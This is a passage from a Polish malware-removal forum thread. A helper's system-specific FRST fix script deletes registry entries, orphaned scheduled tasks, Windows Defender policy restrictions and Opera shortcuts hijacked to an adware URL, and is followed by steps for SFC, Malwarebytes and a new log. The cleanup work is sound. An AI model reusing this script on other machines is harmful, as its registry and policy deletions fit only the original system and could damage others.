DeleteValue: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Firefox\TaskBarIDs|C:\Program Files (x86)\Firefox
DeleteKey: HKEY_USERS\S-1-5-21-478647955-3472351390-1182581596-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\52c9d0d1_0
DeleteKey: HKEY_USERS\S-1-5-21-478647955-3472351390-1182581596-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\fca1c7bd_0
DeleteValue: HKEY_USERS\S-1-5-21-478647955-3472351390-1182581596-1000\Software\Classes\FirefoxHTML\DefaultIcon|C:\Program Files (x86)\Firefox\Firefox.exe
DeleteValue: HKEY_USERS\S-1-5-21-478647955-3472351390-1182581596-1000\Software\Classes\FirefoxHTML\shell\open\command|C:\Program Files (x86)\Firefox\Firefox.exe
DeleteValue: HKEY_USERS\S-1-5-21-478647955-3472351390-1182581596-1000\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache|C:\Program Files (x86)\Firefox\Firefox.exe
Task: {1F129FC2-B28B-4F23-95C2-11BDF2DA58D8} - \82F37914-A36A-6A79-9CCE-BAC5980BBB44 -> Brak pliku 
Task: {6A1F19EA-FEA4-4EB4-8C78-71ED288E5F41} - \{F55353F7-257A-4BE2-CE80-ED3F1C1ADC3E} -> Brak pliku 
Task: {701E6EDB-E683-4D57-813D-E256B1808554} - System32\Tasks\{0EDCAC6C-EC6E-4273-9CC9-9C597BBB150D} => D:\Holiday Express\HolidayExpress.exe
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Przeglądarka Opera.lnk -> C:\Program Files (x86)\Opera\launcher.exe (Opera Software) -> hxxp://www.mylucky123.com/?type=sc&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB
ShortcutWithArgument: C:\Users\Public\Desktop\Przeglądarka Opera.lnk -> C:\Program Files (x86)\Opera\launcher.exe (Opera Software) -> hxxp://www.mylucky123.com/?type=sc&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ograniczenia 
C:\Users\administratorka\Desktop\gierki\Holiday Express.lnk 
EmptyTemp:

 

Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach.

 

Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt.

 

2. Dostarcz przefiltrowany raport SFC z opcji sfc /scannow w celu sprawdzenia integralności Windows.

 

3. Całościowo przeskanuj system za pomocą Malwarebytes AntiMalware. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 

 

4. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition, ale już bez Shortcut. Dołącz też plik fixlog.txt.

Odnośnik do komentarza

Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto

Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.

Zarejestruj nowe konto

Załóż nowe konto. To bardzo proste!

Zarejestruj się

Zaloguj się

Posiadasz już konto? Zaloguj się poniżej.

Zaloguj się
Tematy

  • Ostatnio przeglądający   0 użytkowników

    • Brak zarejestrowanych użytkowników przeglądających tę stronę.
×
×
  • Dodaj nową pozycję...